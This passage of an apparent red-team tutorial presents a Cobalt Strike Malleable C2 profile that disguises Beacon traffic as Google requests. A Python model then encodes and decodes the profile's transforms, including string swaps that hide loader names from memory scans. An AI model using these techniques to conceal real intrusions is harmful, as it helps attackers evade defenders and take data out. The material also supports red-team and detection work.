##      Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM=
##      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1)
## Guidelines:
##    - Decide if you want to use HTTP GET or HTTP POST requests for this section
##    - Add customized HTTP headers to the HTTP traffic of your campaign
##    - Analyze sample HTTP traffic to use as a reference
## This http-post section is active and uses HTTP POST
http-post {

    set uri "/api/i=182&id=2592";
    set verb "POST";

    client {

        header "Accept" "text/plain; charset=UTF-8";
        header "Host" "www.google.com";
        header "Referer" "https://google.com/";
        header "Accept-Encoding" "gzip, deflate";
        # A hard-coded cookie is identical in every request and is itself an indicator; change it per campaign.
        header "Cookie" "to02JiZxXQXNbpjTUxJfFKhJqYD6gboU;YoL6r7gv2Nsy2IMrdJg1iR8OEqgkgdzQ;name=XACXPrcRLxvfaGQgEEuIRoNOPW8GQ1cf";
        id {
            mask;
            base64url;
            parameter "__ws9zc.n7z3gwf";
        }

        output {
            mask;
            base64url;
            print;
        }
    }

    server {

        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "text/plain; charset=utf-8";

        output {
            mask;
            base64url;
            ## The response body looks like a form-style key/value string; the encoded output sits in the contents= value.
            ## The '&' at the start of the appended string keeps the encoded data from running into the next key.
            prepend "id=2024&post=double&render=true&contents=";
            append "&length=1055&status=active&submit=true";
            print;
        }
    }
}
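To see what the transform chains above actually produce on the wire, and to reverse them the way the team server (or an analyst holding the profile) would, here is a small Python model of the transforms this profile names in its stage, http-get and http-post blocks. It is example code added for this post, not Cobalt Strike's implementation. Assumptions: mask is modelled as a random 4-byte XOR key prepended to the data (the layout public Beacon traffic decoders use), base64url keeps its '=' padding, the http-post append value is written with a leading '&' separator, and the metadata and task-output payloads are constructed samples.

```python
"""Model of the Malleable C2 data transforms this profile uses.
Example code written for this post, not Cobalt Strike's implementation.
Assumed: 'mask' = random 4-byte XOR key prepended to the data (the layout
public Beacon decoders use); base64url keeps '=' padding."""
import base64
import os
import re

# Transform chains copied from the profile, in profile order.
HTTP_GET_METADATA = [("base64url", None), ("prepend", b"__cfduid="), ("header", b"Cookie")]
HTTP_POST_SERVER_OUTPUT = [
    ("mask", None), ("base64url", None),
    ("prepend", b"id=2024&post=double&render=true&contents="),
    ("append", b"&length=1055&status=active&submit=true"),  # leading '&' assumed
    ("print", None),
]
STAGE_X86 = [  # transform-x86 block: nop sled, then string replacements
    ("prepend", b"\x90" * 9),
    ("strrep", (b"ReflectiveLoader", b"execute")),
    ("strrep", (b"This program cannot be run in DOS mode", b"")),
    ("strrep", (b"beacon.dll", b"")),
]


def mask(data: bytes) -> bytes:
    """XOR with a fresh 4-byte key and prepend the key (assumed layout)."""
    key = os.urandom(4)
    return key + bytes(b ^ key[i % 4] for i, b in enumerate(data))


def unmask(data: bytes) -> bytes:
    key, body = data[:4], data[4:]
    return bytes(b ^ key[i % 4] for i, b in enumerate(body))


def apply(data: bytes, steps) -> bytes:
    """Run a chain forward. header/parameter/print only say where the
    result goes; they do not change the bytes."""
    for name, arg in steps:
        if name == "base64url":
            data = base64.urlsafe_b64encode(data)
        elif name == "mask":
            data = mask(data)
        elif name == "prepend":
            data = arg + data
        elif name == "append":
            data = data + arg
        elif name == "strrep":
            data = data.replace(arg[0], arg[1])
        elif name not in ("header", "parameter", "print"):
            raise ValueError(f"unknown transform {name}")
    return data


def reverse(data: bytes, steps) -> bytes:
    """Undo a chain in reverse order, as the team server (or an analyst
    holding the profile) does. Fails loudly if the markers are not there."""
    for name, arg in reversed(steps):
        if name == "base64url":
            data = base64.urlsafe_b64decode(data)
        elif name == "mask":
            data = unmask(data)
        elif name == "prepend":
            if not data.startswith(arg):
                raise ValueError("prepend marker missing")
            data = data[len(arg):]
        elif name == "append":
            if not data.endswith(arg):
                raise ValueError("append marker missing")
            data = data[:len(data) - len(arg)]
        elif name == "strrep":
            raise ValueError("strrep is not reversible")
    return data


def build_get_request(metadata: bytes) -> str:
    """Render the http-get poll with the metadata in the Cookie header."""
    cookie = apply(metadata, HTTP_GET_METADATA).decode("ascii")
    return ("GET /default.html HTTP/1.1\r\nHost: www.google.com\r\n"
            f"Referer: https://google.com/\r\nCookie: {cookie}\r\n\r\n")


def recover_get_metadata(request: str) -> bytes:
    """Pull the cookie back out of a captured poll and undo the chain."""
    m = re.search(r"^Cookie: ([^\r\n]+)", request, re.M)
    if not m:
        raise ValueError("no Cookie header")
    return reverse(m.group(1).encode("ascii"), HTTP_GET_METADATA)


if __name__ == "__main__":
    meta = b"\x00\x00\xbe\xef constructed metadata blob"  # constructed sample
    req = build_get_request(meta)
    print(req)
    assert recover_get_metadata(req) == meta
    body = apply(b"constructed task output", HTTP_POST_SERVER_OUTPUT)
    print(body.decode("ascii"))
    print(apply(b"MZ..ReflectiveLoader..beacon.dll", STAGE_X86))
```

Two things worth noticing when you run it: the prepend and append strings are fixed, so anyone who has your profile (or captures enough traffic) can strip them and decode the rest mechanically, which is why a profile that has been published is no longer a good one; and the stage strrep edits are one-way, so a defender who scans memory for "ReflectiveLoader" misses it, but a scan for the replacement string or the nop sled does not.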

Conclusion

Cobalt Strike gives you a great deal of flexibility in how you configure your Beacon. I do want to remind you that these options require attention and thought so that the profile you build is unique to your needs rather than copied from the internet. Run any profile through c2lint before loading it on the team server so syntax errors and transform problems are caught in advance. The profile above is now public, so expect the blue team to be able to find it.

